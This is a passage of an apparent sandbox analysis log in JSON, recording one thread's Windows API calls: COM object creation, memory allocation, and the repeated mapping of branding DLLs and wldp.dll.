"timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ffed3feaddd", "parentcaller": "0x7ffee2fc0030", "category": "com", "api": "CoGetClassObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "E7D35CFA-348B-485E-B524-252725D697CA" }, { "name": "ClsContext", "value": "0x80000001", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_PS_DLL" }, { "name": "riid", "value": "D5F569D0-593B-101A-B569-08002B2DBF7A" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 92 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ff79aafd767", "parentcaller": "0x7ff79ab014cb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba19000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 93 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba1a000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 94 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "com", "api": "CoCreateInstance", "status": true, "return": "0x00000000", "arguments": [ { "name": "rclsid", "value": "4590F812-1D3A-11D0-891F-00AA004B2E24" }, { "name": "ClsContext", "value": "0x00000403", "pretty_value": "CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER|CLSCTX_NO_CODE_DOWNLOAD" }, { "name": "riid", "value": "00000003-0000-0000-C000-000000000046" }, { "name": "ProgID", "value": "" } ], "repeated": 0, "id": 95 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba1c000" }, { "name": "RegionSize", "value": "0x00006000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 96 }, { "timestamp": "2025-11-20 10:58:33,788", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba22000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 97 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002ec" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\winbrand.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 98 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000330" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffecbda0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00035000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 99 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\winbrand" }, { "name": "DllBase", "value": "0x7ffecbda0000" } ], "repeated": 0, "id": 100 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000032c" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 101 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000300" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0016a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 102 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "RegionSize", "value": "0x0016a000" } ], "repeated": 0, "id": 103 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000300" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 104 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000032c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0016a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 105 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000032c" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\ru-RU\\Basebrd.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 106 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000300" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c090000" }, { "name": "SectionOffset", "value": "0x3f6827b300" }, { "name": "ViewSize", "value": "0x00003000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 107 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wldp" }, { "name": "DllBase", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 108 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "wldp.dll" }, { "name": "BaseAddress", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 109 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba25000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 110 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "unload" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wldp" }, { "name": "DllBase", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 111 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0500000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 112 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c090000" }, { "name": "RegionSize", "value": "0x00003000" } ], "repeated": 0, "id": 113 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "RegionSize", "value": "0x0016a000" } ], "repeated": 0, "id": 114 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba27000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 115 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000032c" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 116 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000300" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0016a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 117 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "RegionSize", "value": "0x0016a000" } ], "repeated": 0, "id": 118 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000300" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 119 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000032c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0016a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 120 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000032c" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\ru-RU\\Basebrd.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 121 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000300" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c090000" }, { "name": "SectionOffset", "value": "0x3f6827b300" }, { "name": "ViewSize", "value": "0x00003000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 122 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wldp" }, { "name": "DllBase", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 123 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "wldp.dll" }, { "name": "BaseAddress", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 124 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "unload" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wldp" }, { "name": "DllBase", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 125 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0500000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 126 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c090000" }, { "name": "RegionSize", "value": "0x00003000" } ], "repeated": 0, "id": 127 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "RegionSize", "value": "0x0016a000" } ], "repeated": 0, "id": 128 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000032c" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "3", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_WRITE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 129 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2ba29000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 130 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000032c" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 131 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000300" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0016a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 132 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "RegionSize", "value": "0x0016a000" } ], "repeated": 0, "id": 133 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000300" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 134 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000032c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0016a000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 135 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000032c" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\ru-RU\\Basebrd.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 136 }, { "timestamp": "2025-11-20 10:58:33,803", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x00000300" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c090000" }, { "name": "SectionOffset", "value": "0x3f6827bbf0" }, { "name": "ViewSize", "value": "0x00003000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 137 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "load" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wldp" }, { "name": "DllBase", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 138 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "wldp.dll" }, { "name": "BaseAddress", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 139 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "system", "api": "DllLoadNotification", "status": true, "return": "0x00000000", "arguments": [ { "name": "NotificationReason", "value": "unload" }, { "name": "DllName", "value": "C:\\Windows\\SYSTEM32\\wldp" }, { "name": "DllBase", "value": "0x7ffee0500000" } ], "repeated": 0, "id": 140 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7ffee0500000" }, { "name": "RegionSize", "value": "0x00001000" } ], "repeated": 0, "id": 141 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2c090000" }, { "name": "RegionSize", "value": "0x00003000" } ], "repeated": 0, "id": 142 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", "api": "NtUnmapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x21e2dc10000" }, { "name": "RegionSize", "value": "0x0016a000" } ], "repeated": 0, "id": 143 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000032c" }, { "name": "DesiredAccess", "value": "0x80100080", "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\Branding\\Basebrd\\basebrd.dll" }, { "name": "CreateDisposition", "value": "1", "pretty_value": "FILE_OPEN" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" }, { "name": "FileAttributes", "value": "0x00000000" }, { "name": "ExistedBefore", "value": "yes" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 144 }, { "timestamp": "2025-11-20 10:58:33,819", "thread_id": "4248", "caller": "0x7ff79ab0158d", "parentcaller": "0x7ff79ab011eb", "category": "process", 